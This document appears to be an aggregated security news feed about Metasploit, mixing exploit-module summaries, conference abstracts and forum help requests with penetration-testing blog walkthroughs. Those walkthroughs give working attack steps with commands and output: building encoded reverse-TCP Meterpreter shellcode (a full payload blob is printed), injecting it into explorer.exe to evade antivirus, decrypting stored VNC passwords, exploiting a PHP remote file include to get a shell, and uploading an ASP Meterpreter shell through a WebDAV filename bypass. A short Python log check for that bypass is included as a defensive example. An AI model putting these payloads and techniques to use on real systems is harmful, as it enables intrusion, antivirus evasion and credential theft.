Packet Storm Security Recent Files
This whitepaper is an article that covers the basic structure of Metasploit and the need for it as a framework. It provides guidance on the different techniques of information gathering and scans.
-
-
-
8:27
»
Packet Storm Security Recent Files
Whitepaper called Using Metasploit With Nessus Bridge On Ubuntu. The author discusses using the autopwn feature in Metasploit, running Nessus from within Metasploit, choices of databases to use, and the benefits of each.
-
-
-
17:47
»
Packet Storm Security Recent Files
ClubHACK Magazine Issue 18 - Topics covered include using Metasploit with Nessus bridge on Ubuntu, Armitage, penetration testing with Metasploit, and various other articles.
-
-
-
4:12
»
Carnal0wnage
You may find yourself needing to do process injection outside of Metasploit/Meterpreter. Good examples are when you have a Java Meterpreter shell, or you have access to a GUI environment (Citrix), and/or AV is going all nom nom nom on your Metasploit binary.

There are two public options I have found: shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom), inject it into memory (into another process, in syringe's case) and get your Meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexec
http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."
"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."
Make the payload (pipe the raw output of msfpayload straight into msfencode):
$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R \
  | ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA
Set up a listener to catch the shell:
$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Run it on the windows side:
C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt
Once you have a shell you need to migrate out of it: it runs inside the shellcodeexec process, and as soon as someone ctrl-c's or kills that cmd.exe the process dies and so does your shell.
Looks like this:
Syringe
http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspx
http://www.securestate.com/Documents/syringe.c
= Short description =
"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"
To compile: "C:\codelocation\cl syringe.c"
C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility
Usage:
Inject DLL:
syringe.exe -1 [ dll ] [ pid ]
Inject Shellcode:
syringe.exe -2 [ shellcode ] [ pid ]
Execute Shellcode:
syringe.exe -3 [ shellcode ]
-3 has the same issue as shellcodeexec: close cmd.exe or ctrl-c and you lose the shell.
-2 is preferred: locate explorer.exe in the process list and inject the shellcode into that, so the shell lives in a process the user will not close.
C:\Documents and Settings\User\Desktop>tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        424 K
csrss.exe                    604 Console                 0      3,852 K
winlogon.exe                 628 Console                 0      5,012 K
services.exe                 680 Console                 0      3,440 K
lsass.exe                    692 Console                 0      1,408 K
vmacthlp.exe                 848 Console                 0      2,756 K
svchost.exe                  864 Console                 0      4,924 K
svchost.exe                  944 Console                 0      4,308 K
MsMpEng.exe                 1040 Console                 0     53,812 K
svchost.exe                 1076 Console                 0     23,780 K
svchost.exe                 1164 Console                 0      3,616 K
svchost.exe                 1368 Console                 0      3,916 K
explorer.exe                1624 Console                 0     15,256 K
spoolsv.exe                 1656 Console                 0      6,072 K
VMwareTray.exe              1848 Console                 0      5,044 K
VMwareUser.exe              1856 Console                 0      6,328 K
msseces.exe                 1864 Console                 0     10,708 K
jusched.exe                 1920 Console                 0      4,304 K
msmsgs.exe                  1928 Console                 0      2,488 K
ctfmon.exe                  1952 Console                 0      3,248 K
svchost.exe                  740 Console                 0      3,760 K
jqs.exe                     1108 Console                 0      1,396 K
vmtoolsd.exe                1264 Console                 0      9,976 K
VMUpgradeHelper.exe         1212 Console                 0      4,176 K
TPAutoConnSvc.exe           2396 Console                 0      4,392 K
alg.exe                     2680 Console                 0      3,612 K
TPAutoConnect.exe           3060 Console                 0      4,848 K
iexplore.exe                3784 Console                 0     16,300 K
iexplore.exe                4064 Console                 0     45,392 K
wuauclt.exe                 1224 Console                 0      4,276 K
java.exe                    1112 Console                 0     27,516 K
java.exe                    2520 Console                 0     14,272 K
notepad.exe                  440 Console                 0      3,572 K
jucheck.exe                 3112 Console                 0      6,120 K
cmd.exe                     3260 Console                 0      2,700 K
tasklist.exe                3332 Console                 0      4,580 K
wmiprvse.exe                3368 Console                 0      5,824 K
C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ[...] 1624
Looks like this (you can use the same shellcode in syringe):
-
-
0:52
»
Packet Storm Security Recent Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
-
-
19:24
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in the Golden FTP service. This Metasploit module uses the PASS command to trigger the overflow.
-
-
-
21:52
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that is supposed to handle this routine ends up returning the input as a pointer, which is later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with an arbitrary value and results in code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application registers two file handlers, VWS and VWR, which allows a victim user to 'double click' the malicious VWR file and execute code.
13:36
Packet Storm Security Recent Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
19:32
Carnal0wnage
inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.
9:59
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
13:25
SecDocs
Authors: Max Moser, Philipp Schrödel
Tags: web application, web, Metasploit
Event: Hashdays 2010
Abstract: The talk introduces our new open source extension for the well known Metasploit Framework, called CARAT. It uses Metasploit's Meterpreter technology to communicate between the client (the target to be scanned) and the server (the Metasploit server running the CARAT plugin), execute commands and consolidate the results. By introducing client-specific job scheduling to Metasploit, CARAT is a framework for automated configuration validation, security assessments and functional testing of components and applications. In contrast to a lot of other available frameworks, CARAT's architecture is as simple as possible, which allows a great amount of flexibility to its users.
12:24
Carnal0wnage
You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.
This is awesome because before that I had to use Immunity's
VAAseline to do VNC bruteforcing. But now you can just use vnc_login.
So the scenario is you find yourself on the other end of a VNC server.

It's tedious to password guess like this

Instead let's use the metasploit module

and throw a dictionary attack against the VNC server

Looks like the VNC no auth module had been ported and stuck in there too :-)

-CG
9:11
Packet Storm Security Recent Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
17:44
Packet Storm Security Exploits
The TFTPUtil GUI server version 1.4.5 can be crashed (denial of service) by sending a specially crafted read request. Depending on the setup, sending the write request "\x00\x02" may also work. This is written as a Metasploit module.
18:10
Packet Storm Security Exploits
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
9:29
Packet Storm Security Exploits
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
22:17
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. This Metasploit module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.
16:07
Packet Storm Security Recent Files
Whitepaper called Creating Windows Exploits with the Metasploit Framework, or Criar Exploits Para o Windows com a Ajuda da Metasploit Framework. Written in Portuguese.
19:41
remote-exploit & backtrack
Hi everyone, I feel like a bit of a goose regarding this issue but after searching and searching I still can't find my answer so I was hoping someone could shed some light on this for me.
The problem I am having is that when I try to output an nmap scan using metasploit for example:
msf> db_nmap -v -sV 192.168.238.100 -oA /home/output
I only get the grepable output and not the other major outputs; if I specify that I want XML output it won't produce any output at all.
However if I am using nmap as a standalone application all the output options and formats work as they should.
I'm running Backtrack 4 R1, with Metasploit 3.4.2-dev and nmap 5.35DC1.
16:47
Carnal0wnage
Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how you get this info once you're inside and using meterpreter as your pivot into the network.
Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can TCP port scan and find open ports or use the http_version module to see the server version, but you don't get a feel for what's actually on the site.
I opted to write something that would scan a range, perform an HTTP GET of / on the IP, then take the resulting body from the response, which should be HTML, and save it to a file to look at afterwards.
Looks like this when it runs...
msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/
you can then check out the folder with the results

code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb
16:01
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This Metasploit module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
10:41
remote-exploit & backtrack
Hello, I've recently started working with metasploit. For that I set up my Ubuntu Linux with metasploit and a Windows XP Home SP2 in a VM. I created a file with msfpayload:
Code:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.178.50 V > /tmp/testfile.bas
I then try to integrate this file into the Word file, but as soon as I want to save with the imported code I always get the message that I have too little memory.
Does anyone have an idea what might be causing this? Thanks in advance for the help.
Thanks in advance
6:46
remote-exploit & backtrack
Hi,
I have BackTrack 4 running in a VM. I wanted to get into Metasploit a bit, but when updating an error always occurs:
Code:
root@bt:/pentest/exploits/exploitdb# msfupdate
Updating Metasploit from metasploit.com/svn/framework3/trunk...
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: cleaning up the SVN directory and retrying...
svn: In directory '.'
svn: Error processing command 'modify-wcprop' in '.'
svn: 'HACKING' is not under version control
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: please check connectivity to the following URL:
metasploit.com/svn/framework3/trunk
root@bt:/pentest/exploits/exploitdb#
Does anyone have an idea what this could be? There is an internet connection, though.
Thanks in advance
8:50
remote-exploit & backtrack
hi all,
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 569 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9903 updated today (2010.07.21)
my bt 4 final new metasploit java GUI [Exploits, Auxiliary, Payload (Menu)] not working, please help me ..........
thks for all
22:02
Packet Storm Security Exploits
USBsploit is a proof of concept for dumping files from remote USB drives on multiple targets at the same time. It works through Meterpreter sessions with a light (24MB) modified version of Metasploit. The interface is a modified version of SET. usbsploit.rb can also be used with the original Metasploit Framework.
10:41
SecDocs
Authors: Christian Papathanasiou
Tags: web server, exploiting, JBoss
Event: Black Hat EU 2010
Abstract: JBoss Application Server is the open source implementation of the Java EE suite of services. Its easy-to-use server architecture and high flexibility make JBoss the ideal choice for users just starting out with J2EE, as well as senior architects looking for a customizable middleware platform. The pervasiveness of JBoss in enterprise JSP deployments is second to none, meaning there is an abundance of targets for the blackhat and the pentester alike. JBoss is usually invoked as root/SYSTEM, meaning that any potential exploitation usually results in immediate super user privileges. A tool has been developed that is able to compromise an unprotected JBoss instance. The current state of the art in published literature involves having the JBoss instance connect back to the attacker to obtain a war file that is subsequently deployed. The tool that will be presented at Black Hat does this in-situ and ultimately uploads a Metasploit payload, resulting in interactive command execution on the JBoss instance. On Windows platforms, through the Metasploit framework a fully interactive reverse VNC shell can also be obtained and shall be demonstrated. Depending on the platform that has been exploited and the level of access obtained, the tool is able to deploy the Metasploit payload as a persistent backdoor in conjunction with the Metasploit framework's antivirus evasion techniques. Due to the cross platform nature of the Java language, we are able to compromise JBoss instances running on Linux, MacOSX and Windows.
2:43
Packet Storm Security Recent Files
This Metasploit module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
22:48
remote-exploit & backtrack
Quote:
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
[-]
[*] Usage: db_create <user:pass>@<host:port>/<database>
[*] Examples:
[*] db_create user@metasploit3
[*] db_create user:pass@192.168.0.2/metasploit3
[*] db_create user:pass@192.168.0.2:1500/metasploit3
I got this error, please give me any idea to fix it, thanks
4:20
SecDocs
Authors: H.D. Moore
Tags: Metasploit
Event: Black Hat DC 2010
Abstract: In 2008 Metasploit expanded from a community-run project to a corporate product managed by Rapid7. This talk focuses on the transition, the lessons learned during the acquisition process, the challenges of maintaining a community, and the latest improvements to the Metasploit Framework. The points covered in this talk are valuable for anyone building an open-source product, contemplating the purchase of one, or considering using an open source product to build a commercial application.
2:07
SecDocs
Authors: Mike Kershaw
Tags: wireless, Metasploit, WiFi
Event: Black Hat DC 2010
Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
21:04
SecDocs
Authors: James Lee
Tags: Metasploit
Event: Black Hat DC 2010
Abstract: Sometimes you need to choose your exploits precisely and be careful about the packets you write to the wire. Sometimes you just want to type a command, go get some coffee, and come back to a pile of shells. This talk will cover the means that the Metasploit Framework provides for accomplishing both of these goals, including many advancements from my talk at Black Hat USA in the realm of client-side exploitation.
19:19
Carnal0wnage
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.
Not too complicated to use: set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path, putting XXpathXX where you would normally put your php shell. So we take something like
Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
10:01
Packet Storm Security Recent Files
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This Metasploit module was tested successfully against master.exe as included with Real Networks' Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This Metasploit module does not work with NX/XD enabled but could be modified easily to do so. The address
7:20
Carnal0wnage
intro..webdav stuff...lazy...
To get yourself a test environment you can follow this tutorial, it's not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have write access, or you can set up a windows account to use authentication.
metasploit has a few modules to test for webDAV presence.
webdav_scanner:
msf auxiliary(webdav_scanner) > run
[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_internal_ip
msf auxiliary(webdav_internal_ip) > run
[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_website_content
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory if someone has shared out the root directory it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or if you have the path wrong
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If we need to see what options are allowed, you can use the http options auxiliary module.
msf auxiliary(options) > run
[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. In this case I can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.
If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(
Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.
So we generate our evil.asp file using msfpayload and msfencode; you could also use any other asp shell too...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
upload it and rename it
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
Now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.
More info here:
http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html
Resources:
cadaver:
http://www.webdav.org/cadaver/
DAVtest:
http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit:
http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb
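From the defender's side, the useful artifact of the trick above is the filename itself: a `;` (or its encoded form `%3b`) sitting between a script extension and the harmless-looking `.txt`. The following is an added example, not code from the original post: a small Python check that flags that pattern in constructed W3C-style request log lines, where the trailing Destination field for COPY/MOVE is an assumed custom log field rather than a default IIS one.

```python
"""Flag the 'shell.asp;.txt' WebDAV naming trick in W3C-style request logs.
Added defensive example, not code from the original post; log lines are
constructed and the trailing Destination field is an assumed custom field."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# On IIS 6 / Windows 2003 the script mapping looks at the part of the filename
# before the first ';', so "x.asp;.txt" passes a .txt-only filter yet runs as ASP.
SCRIPT_EXTS = {"asp", "aspx"}
WRITE_METHODS = {"PUT", "COPY", "MOVE"}
# date time c-ip cs-method cs-uri-stem sc-status destination ('-' when absent)
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")


def effective_extension(path: str) -> Optional[str]:
    """Extension IIS 6 would map the last path segment to (';' may be %3b)."""
    name = unquote(path).rsplit("/", 1)[-1]
    base = name.split(";", 1)[0]
    if "." not in base:
        return None
    return base.rsplit(".", 1)[-1].lower()


def is_semicolon_bypass(path: str) -> bool:
    """True when a ';' hides a script extension inside the filename."""
    name = unquote(path).rsplit("/", 1)[-1]
    return ";" in name and effective_extension(path) in SCRIPT_EXTS


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (method, target, hidden_ext) for each suspicious request.
    Write methods are checked on URI and Destination (the post renames via
    COPY); other methods, e.g. the GET that runs the shell, on the URI only."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        _d, _t, _cip, method, uri, _status, dest = m.groups()
        targets = [uri]
        if method in WRITE_METHODS and dest != "-":
            targets.append(dest)
        for target in targets:
            if is_semicolon_bypass(target):
                findings.append((method, target, effective_extension(target)))
    return findings


# Constructed sample mirroring the cadaver session in the post.
SAMPLE_LOG = [
    "2010-01-05 10:11:12 192.168.6.94 PUT /davaroo/tcp443meterp.txt 201 -",
    "2010-01-05 10:11:40 192.168.6.94 COPY /davaroo/tcp443meterp.txt 201 "
    "/davaroo/tcp443meterp.asp%3b.txt",
    "2010-01-05 10:11:55 192.168.6.94 PUT /davaroo/notes;v2.txt 201 -",
    "2010-01-05 10:12:03 192.168.6.94 GET /davaroo/tcp443meterp.asp;.txt 200 -",
]
```

On the sample, only the COPY destination and the later GET are reported; the plain `.txt` upload and a benign `notes;v2.txt` are not, since no script extension precedes the semicolon.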
16:33
Packet Storm Security Recent Files
This Metasploit module exploits a buffer overflow in Serenity AudioPlayer versions 3.2.3 and below. By creating a specially crafted m3u file, an attacker may be able to execute arbitrary code.
0:00
Packet Storm Security Exploits
